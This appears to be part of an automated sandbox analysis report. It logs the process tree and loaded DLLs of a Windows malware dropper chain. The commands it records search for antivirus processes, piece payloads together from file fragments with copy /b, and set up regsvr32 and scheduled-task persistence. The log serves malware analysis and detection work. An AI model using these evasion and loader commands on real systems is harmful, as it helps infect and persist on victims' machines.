                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess created: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe "C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess created: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe "C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe "C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe "C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe "C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe "C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E GeographicJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeProcess created: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp "C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp" /SL5="$C0024,3499155,56832,C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe "C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe" -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp "C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp" /SL5="$E0074,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp "C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp" /SL5="$30490,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: mstask.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: dui70.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: duser.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: chartv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: atlthunk.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: explorerframe.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: coreuicomponents.dllJump to behavior
